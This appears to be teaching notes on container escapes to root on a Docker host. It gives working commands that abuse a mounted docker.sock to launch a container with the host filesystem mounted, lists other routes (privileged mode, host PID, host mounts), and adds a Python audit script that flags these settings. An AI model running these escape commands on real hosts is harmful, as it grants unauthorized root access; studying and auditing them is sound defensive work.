Gaining root access to a Docker host

1. Via /var/run/docker.sock mount

docker run -it -v /var/run/docker.sock:/container/mypath/docker.sock ubuntu
apt-get update
apt-get install -y docker.io
docker -H unix:///container/mypath/docker.sock ps

Inside the container ...

docker -H unix:///container/mypath/docker.sock run -it -v /:/mnt/host ubuntu bash
   cat /mnt/host/etc/hostname
   exit

Is this unusual? Nope.

Check out https://www.portainer.io/installation/ ... any questions? :-)

Something tricky

apt-get update
apt-get install -y curl jq

curl --unix-socket /container/mypath/docker.sock http://localhost/v1.41/version

ID=$(curl -XPOST --unix-socket /container/mypath/docker.sock -d '{"Image":"docker.io/library/nginx:latest"}' -H 'Content-Type: application/json' http://localhost/v1.41/containers/create |  jq -r .Id)

curl -XPOST --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/$ID/start 

curl -XGET --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/json

2. Intercepting /var/run/docker.sock

3. Via mounting "dangerous" locations

See /examples/host_mount and /addons/pod_escape_log.md

4. Via --privileged (1)

Check this out: https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1

5. Via --pid

Use a standard ubuntu image with nsenter / lsns ....
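
A defender-side check for the container settings behind items 1, 3, 4 and 5, as an added example that is not part of the original page: it reads `docker inspect` JSON and flags a mounted Docker socket, dangerous host bind mounts, privileged mode and a shared host PID namespace. The sample input is constructed, and the DANGEROUS_SOURCES list and the function names are assumptions.

```python
import json

# Assumption: host paths treated as dangerous bind-mount sources. The page
# does not enumerate them; adjust to local policy.
DANGEROUS_SOURCES = ("/", "/etc", "/proc", "/sys", "/root", "/var/lib/docker")

def audit_container(c):
    """Return findings for one container object from `docker inspect`."""
    findings = []
    host_cfg = c.get("HostConfig") or {}
    if host_cfg.get("Privileged"):          # item 4: --privileged
        findings.append("privileged")
    if host_cfg.get("PidMode") == "host":   # item 5: --pid=host
        findings.append("host-pid-namespace")
    for m in c.get("Mounts") or []:
        if m.get("Type") != "bind":
            continue
        src = (m.get("Source") or "").rstrip("/") or "/"
        if src.endswith("/docker.sock"):    # item 1: socket mounted in
            findings.append("docker-socket:" + src)
        elif src in DANGEROUS_SOURCES:      # item 3: dangerous host path
            mode = "rw" if m.get("RW") else "ro"
            findings.append("host-mount:%s(%s)" % (src, mode))
    return findings

def audit(inspect_json):
    """Map container name -> findings, only for containers with findings."""
    report = {}
    for c in json.loads(inspect_json):
        found = audit_container(c)
        if found:
            report[c.get("Name", "?").lstrip("/")] = found
    return report

# Constructed sample shaped like `docker inspect` output (not real data).
SAMPLE = json.dumps([
    {"Name": "/ui", "HostConfig": {"Privileged": False, "PidMode": ""},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/container/mypath/docker.sock", "RW": True}]},
    {"Name": "/debug", "HostConfig": {"Privileged": True, "PidMode": "host"},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/host",
                 "RW": True}]},
    {"Name": "/web", "HostConfig": {"Privileged": False, "PidMode": ""},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/w/_data",
                 "Destination": "/data", "RW": True}]},
])

if __name__ == "__main__":
    for name, found in audit(SAMPLE).items():
        print(name + ": " + ", ".join(found))
```

To audit a live host, pass the output of `docker inspect $(docker ps -q)` to audit().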
